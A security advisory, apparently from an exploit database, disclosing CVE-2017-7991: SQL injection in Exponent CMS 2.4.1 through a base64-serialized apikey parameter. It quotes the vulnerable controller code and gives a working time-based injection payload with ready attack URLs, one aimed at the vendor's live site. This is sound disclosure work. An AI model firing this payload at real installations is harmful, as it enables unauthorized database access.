Exponent CMS 2.4.1 SQL Injection

2017-04-21 / 2017-04-22
Credit: 404notfound
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

CVE-2017-7991-SQL injection-Exponent CMS [Suggested description] Exponent CMS 2.4.1 and earlier has SQL injection via a base64 serialized API key (apikey parameter) in the api function of framework/modules/eaas/controllers/eaasController.php. ------------------------------------------ [Additional Information] Vulnerable file is: /framework/modules/eaas/controllers/eaasController.php Vulnerable function is api. public function api() { if (empty($this->params['apikey'])) { $_REQUEST['apikey'] = true; // set this to force an ajax reply $ar = new expAjaxReply(550, 'Permission Denied', 'You need an API key in order to access Exponent as a Service', null); $ar->send(); //FIXME this doesn't seem to work correctly in this scenario } else { echo $this->params['apikey']; $key = expUnserialize(base64_decode(urldecode($this->params['apikey']))); echo $key; $cfg = new expConfig($key); $this->config = $cfg->config; if(empty($cfg->id)) { $ar = new expAjaxReply(550, 'Permission Denied', 'Incorrect API key or Exponent as a Service module configuration missing', null); $ar->send(); } else { if (!empty($this->params['get'])) { $this->handleRequest(); } else { $ar = new expAjaxReply(200, 'ok', 'Your API key is working, no data requested', null); $ar->send(); } } } } We can control param $apikey by using base64_encode and serialize functions to encrypt the SQL injection string. Then, the $apikey will be decrypted and cause SQL injection. Such as, if we want to use "aaa\'or sleep(2)#" to inject, we should use "echo base64_encode(serialize($apikey));" to encrypt the Attack string: czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the result. So, http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 is the PoC. The result is: the site will sleep several seconds, and you can see SQL injection is successful in MySQL logs. ------------------------------------------ [Vulnerability Type] SQL Injection ------------------------------------------ [Vendor of Product] Exponent CMS ------------------------------------------ [Affected Product Code Base] Exponent CMS - 2.4.1 and earlier ------------------------------------------ [Affected Component] \framework\modules\eaas\controllers\eaasController.php,function api(),param $apikey ------------------------------------------ [Attack Type] Remote ------------------------------------------ [Impact Information Disclosure] true ------------------------------------------ [Attack Vectors] http://localhost:88/exponent/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 http://www.exponentcms.org/index.php?module=eaas&action=api&apikey=czoxNjoiYWFhJ29yIHNsZWVwKDIpIyI7 ------------------------------------------ [Discoverer] 404notfound


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top